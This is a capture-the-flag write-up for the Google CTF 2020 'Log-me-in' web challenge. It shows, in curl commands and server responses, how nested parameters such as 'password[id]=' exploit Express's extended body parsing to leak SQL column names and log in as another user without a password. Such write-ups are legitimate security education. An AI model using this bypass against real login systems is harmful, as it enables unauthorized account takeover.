Rating:

# Log-me-in (Web)

## Introduction

This challenge comes with the following instructions:

> Log in to get the flag

> [Attachment](app.js)

> https://log-me-in.web.ctfcompetition.com/

The URL leads to this application:

![Initial screen](img/home.png)

We are able to login with standard `admin`/`admin` credentials:

![Login](img/login.png)

Visiting https://log-me-in.web.ctfcompetition.com/flag displays this message:

![Flag page as Admin](img/flag-admin.png)

The goal of this challenge is to find a way to sign in as Michelle.

## Observations

The login process matches this minimal cURL:

```bash
$ curl -v https://log-me-in.web.ctfcompetition.com/login -d 'username=admin' -d 'password=admin'
...
< HTTP/2 302
< content-type: text/plain; charset=utf-8
< x-powered-by: Express
< location: /me
< vary: Accept
< set-cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IjxzcGFuIGNsYXNzPXRleHQtZGFuZ2VyPk9ubHkgTWljaGVsbGUncyBhY2NvdW50IGhhcyB0aGUgZmxhZzwvc3Bhbj4ifQ==; path=/; httponly
< set-cookie: session.sig=VT8ZiMQxGxmAu1BSzDOvO0c2AFQ; path=/; httponly
< x-cloud-trace-context: 91788d8898e58c9ae9c4811129affb6c
< date: Sun, 24 Aug 2020 19:41:42 GMT
< server: Google Frontend
< content-length: 25
<
* Connection #0 to host log-me-in.web.ctfcompetition.com left intact
Found. Redirecting to /me
```

We observe that the `session` cookie contains the message displayed on the Flag page:

```bash
$ echo eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IjxzcGFuIGNsYXNzPXRleHQtZGFuZ2VyPk9ubHkgTWljaGVsbGUncyBhY2NvdW50IGhhcyB0aGUgZmxhZzwvc3Bhbj4ifQ== | base64 -d
{"username":"admin","flag":"<span>Only Michelle's account has the flag</span>"}
```

## Exfiltration

The [app.js](app.js) attached in the description contains the same flaw as the [Pasteurize](https://github.com/weibell/ctf-google2020/tree/master/pasteurize) challenge:

```javascript
app.use(bodyParser.urlencoded({
extended: true
}))
```

This leads to some interesting results:

```html
$ curl -v https://log-me-in.web.ctfcompetition.com/login -d 'username[x]=' -d 'password[y]='
...

<html>
...
<div class="alert alert-danger alert-dismissible show">
<h3>Error</h3>

Unknown error: Error: ER_BAD_FIELD_ERROR: Unknown column 'x' in 'where clause'


<button type="button" class="close" data-dismiss="alert">×</button>
</div>
...
```

`username`, `password` and `id` appear to be valid column names.

```bash
$ curl -v https://log-me-in.web.ctfcompetition.com/login -d 'username[id]=' -d 'password[id]='
...
< set-cookie: session=eyJ1c2VybmFtZSI6ImFkbWluaXN0cmF0b3IiLCJmbGFnIjoiPHNwYW4gY2xhc3M9dGV4dC1kYW5nZXI+T25seSBNaWNoZWxsZSdzIGFjY291bnQgaGFzIHRoZSBmbGFnPC9zcGFuPiJ9; path=/; httponly
...
Found. Redirecting to /me

$ echo eyJ1c2VybmFtZSI6ImFkbWluaXN0cmF0b3IiLCJmbGFnIjoiPHNwYW4gY2xhc3M9dGV4dC1kYW5nZXI+T25seSBNaWNoZWxsZSdzIGFjY291bnQgaGFzIHRoZSBmbGFnPC9zcGFuPiJ9 | base64 -d
{"username":"administrator","flag":"<span>Only Michelle's account has the flag</span>"}
```

Note that this user `administrator` is different from `admin`.

This allows us to log in as `michelle` without providing a password and retrieving the flag from the cookie:

```bash
$ curl -v https://log-me-in.web.ctfcompetition.com/login -d 'username=michelle' -d 'password[id]='
...
< set-cookie: session=eyJ1c2VybmFtZSI6Im1pY2hlbGxlIiwiZmxhZyI6IkNURnthLXByZW1pdW0tZWZmb3J0LWRlc2VydmVzLWEtcHJlbWl1bS1mbGFnfSJ9; path=/; httponly
...
Found. Redirecting to /me

$ echo eyJ1c2VybmFtZSI6Im1pY2hlbGxlIiwiZmxhZyI6IkNURnthLXByZW1pdW0tZWZmb3J0LWRlc2VydmVzLWEtcHJlbWl1bS1mbGFnfSJ9 | base64 -d
{"username":"michelle","flag":"CTF{a-premium-effort-deserves-a-premium-flag}"}
```

Flag: `CTF{a-premium-effort-deserves-a-premium-flag}`

Original writeup (https://github.com/weibell/ctf-google2020/tree/master/log-me-in).